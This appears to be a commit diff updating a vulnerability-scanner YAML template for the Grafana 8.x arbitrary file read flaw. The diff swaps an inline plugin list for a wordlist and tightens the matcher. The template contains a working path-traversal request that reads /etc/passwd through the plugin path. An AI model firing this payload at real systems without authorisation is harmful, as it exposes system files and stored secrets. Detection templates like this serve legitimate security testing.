Update grafana-file-read.yaml
Prince Chaddha
GitHub
parent
7e0fc34783
commit
428176e5f6
|
|
@ -2,72 +2,31 @@ id: grafana-file-read
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Grafana v8.x Arbitrary File Read
|
name: Grafana v8.x Arbitrary File Read
|
||||||
author: z0ne,dhiyaneshDk, jeya.seelan
|
author: z0ne,dhiyaneshDk,jeya.seelan,dwisiswant0
|
||||||
severity: high
|
severity: high
|
||||||
reference:
|
reference:
|
||||||
- https://nosec.org/home/detail/4914.html
|
- https://nosec.org/home/detail/4914.html
|
||||||
- https://github.com/jas502n/Grafana-VulnTips
|
- https://github.com/jas502n/Grafana-VulnTips
|
||||||
- https://twitter.com/pyn3rd/status/1468138032477859841
|
- hhttps://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47p
|
||||||
- https://twitter.com/naglinagli/status/1468155313182416899
|
- https://twitter.com/naglinagli/status/1468155313182416899
|
||||||
tags: grafana,lfi
|
tags: grafana,lfi,fuzz
|
||||||
remediation: The latest Grafana unpatched 0 Day LFI is now being actively exploited, it affects only Grafana 8.0+, Vulnerable companies should revoke the secrets they store at their /etc/grafana/grafana.ini ASAP as there is no official fix in the meantime.
|
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/public/plugins/{{plugin-id}}/../../../../../../../../../../../../../../../../../../../etc/passwd"
|
- "{{BaseURL}}/public/plugins/{{pluginSlug}}/../../../../../../../../../../../../../../../../../../../etc/passwd"
|
||||||
|
|
||||||
payloads:
|
payloads:
|
||||||
plugin-id:
|
pluginSlug: helpers/wordlists/grafana-plugins.txt
|
||||||
- grafana-clock-panel
|
|
||||||
- alertlist
|
|
||||||
- graph
|
|
||||||
- elasticsearch
|
|
||||||
- dashlist
|
|
||||||
- cloudwatch
|
|
||||||
- mysql
|
|
||||||
- influxdb
|
|
||||||
- heatmap
|
|
||||||
- graphite
|
|
||||||
- prometheus
|
|
||||||
- postgres
|
|
||||||
- pluginlist
|
|
||||||
- opentsdb
|
|
||||||
- text
|
|
||||||
- table
|
|
||||||
- stackdriver
|
|
||||||
- grafana-azure-monitor-datasource
|
|
||||||
- grafana-simple-json-datasource
|
|
||||||
- annolist
|
|
||||||
- barchart
|
|
||||||
- bargauge
|
|
||||||
- candlestick
|
|
||||||
- gauge
|
|
||||||
- geomap
|
|
||||||
- gettingstarted
|
|
||||||
- histogram
|
|
||||||
- jaeger
|
|
||||||
- logs
|
|
||||||
- loki
|
|
||||||
- mssql
|
|
||||||
- news
|
|
||||||
- nodeGraph
|
|
||||||
- piechart
|
|
||||||
- stat
|
|
||||||
- state-timeline
|
|
||||||
- status-history
|
|
||||||
- tempo
|
|
||||||
- timeseries
|
|
||||||
- welcome
|
|
||||||
- zipkin
|
|
||||||
|
|
||||||
|
threads: 50
|
||||||
stop-at-first-match: true
|
stop-at-first-match: true
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
|
||||||
- type: regex
|
- type: regex
|
||||||
regex:
|
regex:
|
||||||
- "root:.*:0:0"
|
- "root:.*:0:0:"
|
||||||
|
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
|
|
|
||||||
Loading…
Reference in New Issue